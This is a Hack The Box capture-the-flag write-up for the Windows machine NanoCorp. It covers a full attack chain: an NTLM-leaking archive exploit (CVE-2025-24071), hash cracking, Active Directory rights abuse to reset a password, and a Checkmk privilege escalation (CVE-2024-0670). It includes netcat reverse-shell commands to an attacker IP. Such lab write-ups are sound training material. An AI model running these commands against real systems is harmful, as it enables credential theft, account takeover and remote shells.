> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / WINDOWS / 2026-06-20

Hack The Box — NanoCorp (Windows)

A File Explorer vulnerability (CVE-2025-24071) allows to steal the credentials of a user. That user can change the password of another user which has shell access on the machine. Finally we can exploit a vulnerability in Checkmk (CVE-2024-0670) to get a reverse shell as nt authority/system.

Target:

  • IP: 10.10.11.93

Port scan

sudo nmap -sC -sV 10.10.11.93 -p- -v
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
80/tcp    open  http              Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-11-12 03:46:36Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.nanocorp.htb
| Issuer: commonName=DC01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-20T01:58:09
| Not valid after:  2026-04-21T01:58:09
| MD5:   4f00:467e:e490:4141:7c94:19b7:4ab3:76e6
|_SHA-1: 0b96:8038:2148:abee:9372:2809:14f1:b62a:a539:320b
|_ssl-date: 2025-11-12T03:48:07+00:00; +9h14m39s from scanner time.
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after:  2026-04-06T23:18:43
| MD5:   2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
|_SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
|_http-server-header: Microsoft-HTTPAPI/2.0
6556/tcp  open  check_mk          check_mk extension for Nagios 2.1.0p10
9389/tcp  open  mc-nmf            .NET Message Framing
49664/tcp open  msrpc             Microsoft Windows RPC
49667/tcp open  msrpc             Microsoft Windows RPC
49671/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
54100/tcp open  msrpc             Microsoft Windows RPC
54119/tcp open  msrpc             Microsoft Windows RPC
58937/tcp open  msrpc             Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Add dc01.nanocorp.htb and nanocorp.htb to /etc/hosts.

Initial enumeration

With a browser, go to http://nanocorp.htb/. It's a PHP website served through Apache on Windows. If you click on about us there is a link to hire.nanocorp.htb. Add hire.nanocorp.htb to /etc/hosts and go to http://hire.nanocorp.htb/. It is also a PHP website.

We can upload a file. The website says that only .zip files are allowed. If we upload an invalid .zip file, we get: Invalid file type. Only ZIP, 7Z, and RAR files are allowed. So we can also upload 7z and RAR files.

File Explorer vulnerability - CVE-2025-24071

There is a vulnerability of Windows File Explorer: CVE-2025-24071.

Here there is a POC: https://github.com/0x6rss/CVE-2025-24071_PoC. Let's replicate it.

Firstly, run responder:

sudo responder -I tun0

Then, run the POC:

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.16.119
completed

A file exploit.zip is created. Upload it to the website. Wait. On the terminal with responder, we get:

[SMB] NTLMv2-SSP Client   : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:9af330c92ab237aa:3FAAAC9EDEC73414E3E3214BFD8E7801:01010000000000000006EA90E579DC01E0E0F7029844F9A60000000002000800540053004D00540001001E00570049004E002D00510031005A003800570036005A00350049003800550004003400570049004E002D00510031005A003800570036005A0035004900380055002E00540053004D0054002E004C004F00430041004C0003001400540053004D0054002E004C004F00430041004C0005001400540053004D0054002E004C004F00430041004C00070008000006EA90E579DC01060004000200000008003000300000000000000000000000002000007542898D7474CAA3E415CB668DEE73B843AA1DC825CD37369E89E55B727127910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100310039000000000000000000

Cracking the password of the user web_svc

Put the hash in a file hash. Crack the hash with hashcat:

hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt

We get:

WEB_SVC::NANOCORP:9af330c92ab237aa:3faaac9edec73414e3e3214bfd8e7801:01010000000000000006ea90e579dc01e0e0f7029844f9a60000000002000800540053004d00540001001e00570049004e002d00510031005a003800570036005a00350049003800550004003400570049004e002d00510031005a003800570036005a0035004900380055002e00540053004d0054002e004c004f00430041004c0003001400540053004d0054002e004c004f00430041004c0005001400540053004d0054002e004c004f00430041004c00070008000006ea90e579dc01060004000200000008003000300000000000000000000000002000007542898d7474caa3e415cb668dee73b843aa1dc825cd37369e89e55b727127910a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e003100310039000000000000000000:dksehdgh712!@#

We got credentials: web_svc / dksehdgh712!@#

Let's use them for SMB enumeration:

nxc smb dc01.nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --shares
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.93     445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB         10.10.11.93     445    DC01             [*] Enumerated shares
SMB         10.10.11.93     445    DC01             Share           Permissions     Remark
SMB         10.10.11.93     445    DC01             -----           -----------     ------
SMB         10.10.11.93     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.93     445    DC01             C$                              Default share
SMB         10.10.11.93     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.93     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.93     445    DC01             SYSVOL          READ            Logon server share

BloodHound enumeration

We can enumerate the domain with bloodhound:

bloodhound-ce-python -u web_svc -p 'dksehdgh712!@#' -ns 10.10.11.93 -d 'nanocorp.htb' -dc dc01.nanocorp.htb -c All --zip

We get a .zip file

Run bloodhound. On Kali Linux:

sudo bloodhound

Upload the .zip on bloodhound.

From bloodhound we see that web_svc hash an AddSelf relationship on the it_support group. So we can add our user to this group.

Download bloodyad: https://github.com/CravateRouge/bloodyAD

python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' add groupMember it_support web_svc
[+] web_svc added to it_support

Changing the password of the user monitoring_svc

From bloodhound we see that the it_support group has a ForceChangePassword relationship on the monitoring_svc user. So we can change the password of this user.

python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' set password monitoring_svc 'Summer2025!'
[+] Password changed successfully!

Now, let's enumerate the SMB shares with the new user:

nxc smb dc01.nanocorp.htb -u monitoring_svc -p 'Summer2025!' --shares
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.93     445    DC01             [-] nanocorp.htb\monitoring_svc:Summer2025! STATUS_ACCOUNT_RESTRICTION

Here the error is explained: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/639c2244-b6d5-4ca3-8ca0-74fe787cbae6. Apparently, this error happens when we use the NTLM authentication. Let's switch to Kerberos authentication. Grab a TGT for the user monitoring_svc:

getTGT.py nanocorp.htb/monitoring_svc:'Summer2025!' -dc-ip 10.10.11.93
[*] Saving ticket in monitoring_svc.ccache
export KRB5CCNAME=monitoring_svc.ccache
nxc smb dc01.nanocorp.htb -d nanocorp.htb -k --use-kcache --shares
SMB         dc01.nanocorp.htb 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB         dc01.nanocorp.htb 445    DC01             [+] nanocorp.htb\monitoring_svc from ccache
SMB         dc01.nanocorp.htb 445    DC01             [*] Enumerated shares
SMB         dc01.nanocorp.htb 445    DC01             Share           Permissions     Remark
SMB         dc01.nanocorp.htb 445    DC01             -----           -----------     ------
SMB         dc01.nanocorp.htb 445    DC01             ADMIN$                          Remote Admin
SMB         dc01.nanocorp.htb 445    DC01             C$                              Default share
SMB         dc01.nanocorp.htb 445    DC01             IPC$            READ            Remote IPC
SMB         dc01.nanocorp.htb 445    DC01             NETLOGON        READ            Logon server share
SMB         dc01.nanocorp.htb 445    DC01             SYSVOL          READ            Logon server share

Now it works. From bloodhound we see that the monitoring_svc user is member of the Remote Management Users group. So we can use evil-winrm to get a shell on the machine.

Firstly, modify the file /etc/krb5.conf and add these lines:

[realms]
        NANOCORP.HTB = {
                kdc = dc01.nanocorp.htb
                admin_server = dc01.nanocorp.htb
        }

[domain_realm]
        .nanocorp.htb = NANOCORP.HTB
        nanocorp.htb = NANOCORP.HTB

Then, run evil-winrm:

evil-winrm -i dc01.nanocorp.htb -u monitoring_svc -r nanocorp.htb -P 5986 -S

We get a powershell shell. However, this shell is not so stable. Let's get a more stable reverse shell.

Download nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) and upload it to the victim machine (for example, using a python http server and curl).

On the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

On the victim machine, run:

C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444

We get a reverse shell. Type powershell to get a powershell shell.

Checkmk - CVE-2024-0670

In the C:\ProgramData folder, we notice the checkmk folder. It is the Checkmk program.

In ProgramData we also find a file cmk_agent_uninstall.txt, which contains:

Checkmk monitoring agent service - 2.1, 64-bit

We have the version, thus we can search on internet for known vulnerabilities. We find one: CVE-2024-0670.

It is described here: https://checkmk.com/werk/16361.

Here there is a POC: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/.

We can create files in C:\Windows\Temp with a name that follows a precise pattern (cmk_all_\d+_1.cmd), and the program will run the commands in that file as the user nt authority/system.

icacls C:\Windows\Temp
C:\Windows\Temp: Access is denied.
Successfully processed 0 files; Failed processing 1 files

Apparently, the monitoring_svc user does not have permission to write in C:\Windows\Temp. Let's try to get a reverse shell as web_svc.

Download RunasCs.exe (https://github.com/antonioCoco/RunasCs) and upload it to the victim machine. Then, on the victim machine, run:

.\RunasCs.exe web_svc 'dksehdgh712!@#' "whoami"
nanocorp\web_svc

We can run commands as web_svc. Let's get the reverse shell.

On the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

On the victim machine, run:

.\RunasCs.exe web_svc 'dksehdgh712!@#' "C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444"

We get a reverse shell as web_svc. Type powershell to get a powershell shell.

icacls C:\Windows\Temp
C:\Windows\Temp BUILTIN\Users:(CI)(S,WD,AD,X)
                BUILTIN\Administrators:(F)
                BUILTIN\Administrators:(OI)(CI)(IO)(F)
                NT AUTHORITY\SYSTEM:(F)
                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                CREATOR OWNER:(OI)(CI)(IO)(F)
                NANOCORP\web_svc:(OI)(CI)(F)

Now we can write in C:\Windows\Temp.

Now, we don't know the number in the name of the file for the exploit, and it can change. To find the range of possible numbers, let's monitor the files cmk_all_*_1.cmd that the program creates in C:\Windows\Temp.

See the attached script monitor.ps1. Upload it on the victim machine.

.\monitor.ps1
Monitoring C:\Windows\Temp for cmk_all_*_*.cmd

To trigger the creation of the file cmk_all, following the POC, we can trigger the fixing of the software.

We have to find the .msi file of checkmk in the folder C:\Windows\Installer. There are several ways:

  1. Reading specific keys of the registry
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | fl

We notice that checkmk has the following local package: C:\Windows\Installer\1e6f2.msi

  1. Checking the .msi files of the folder C:\Windows\Installer. See the attached script check_msi.ps1. Upload it on the victim machine.
.\check_msi.ps1
MSIFile   ProductName
-------   -----------
1e6f2.msi Check MK Agent 2.1
387c2.msi Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532
387c6.msi Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532
387ca.msi Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532
387ce.msi Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532
387d1.msi VMware Tools

We notice that the .msi file of checkmk is 1e6f2.msi.

Now, on another shell as web_svc, following the POC, we trigger the creation of the file cmk_all with the command:

msiexec /fa C:\Windows\Installer\1e6f2.msi /qn

On the terminal with monitor.ps1, we get:

[2025-12-31 16:36:25] Checkmk temp file created: C:\Windows\Temp\cmk_all_7580_1.cmd

We can reasonably assume that the correct range of numbers is between 1000 and 10000.

But, instead of brute forcing the number, since we can monitor when the file cmk_all is created in C:\Windows\Temp, as soon as we detect it, we can overwrite its content with arbitrary commands that we want to run. The idea is to get a reverse shell as nt authority/system.

Copy nc64.exe to C:\Windows\Temp. Then, on the attacking machine, run a netcat listener:

rlwrap nc -vlnp 4444

See the attached script monitor_and_replace.ps1. Upload the script on the victim machine and run it:

.\monitor_and_replace.ps1

On the other shell as web_svc, trigger the creation of the file cmk_all with the command:

msiexec /fa C:\Windows\Installer\1e6f2.msi /qn

On the terminal with monitor_and_replace.ps1, we get:

[2026-01-01 15:43:05] Checkmk temp file created: C:\Windows\Temp\cmk_all_2436_1.cmd
Replaced content with payload

On the terminal with the netcat listener, we get a reverse shell as nt authority/system. Type powershell to get a powershell shell.

whoami
nt authority\system

Useful Notes

Check the number of files in a folder:

$filesCount = (Get-ChildItem "C:\Windows\Temp" -File).Count; $filesCount

Check the 10 most recently accessed files in a folder:

Get-ChildItem C:\Windows\Temp | Sort-Object LastAccessTime -Descending | Select-Object -First 10